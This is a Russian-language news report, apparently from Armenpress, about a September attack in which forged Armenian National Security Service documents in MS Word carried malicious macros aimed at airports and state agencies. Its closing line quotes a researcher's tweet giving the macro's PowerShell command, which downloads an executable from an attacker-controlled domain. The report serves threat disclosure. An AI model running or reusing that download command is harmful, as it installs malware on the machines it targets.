До начала военных действий против Нагорного Карабаха, была осуществлена хакерская атака на госструктуры РА: специалист
ЕРЕВАН, 22 СЕНТЯБРЯ, АРМЕНПРЕСС. Перед широкомасштабными военными действиями Азербайджана против Арцаха, в период с 10 по 19 сентября, произошла серьезная хакерская атака на международные аэропорты «Армения» и государственные структуры Армении.
В беседе с «Арменпресс» эксперт по информационной безопасности Самвел Мартиросян заявил, что вредоносная программа встроена в документ MS Word, который команда хакеров представила в качестве предупреждения СНБ.
«Они распространяли ложные заявления и письма против конкретных объектов, в том числе аэропорта и государственных учреждений, от имени Службы национальной безопасности. Злоумышленники прекрасно знают внутренние бюрократические процессы Армении, текущую ситуацию", - отметил эксперт.
Он отметил, что команда злоумышленников явно серьезная, скорее всего, это хакерская команда со связями в правительстве.
«На данный момент я не могу сказать, кто мог совершить нападение. Следы аналогичны общению хакеров с государственными учреждениями, то есть можно говорить о принадлежности хакерской команды к конкретной стране или обслуживающей государственные интересы этой страны. На данный момент мы не можем четко назвать страну, но таких стран не так много", - сказал Мартиросян.
Нападение было совершено специально против Армении, на армянском языке. Внимание на атаку обратил Чжисян Хао, исследователь кибербезопасности из Сингапура,.
APT attacks target Armenia. Attackers forged documents from the National Security Service of the Republic of Armenia,There is vba macro code
powershell iwr https://karabakhtelekom[.com/api/ekeng-mta.exe -UsebasicParsing -Outfile C:\users\Public\Downloads\ekeng-mta.exe pic.twitter.com/9sFHJB0aax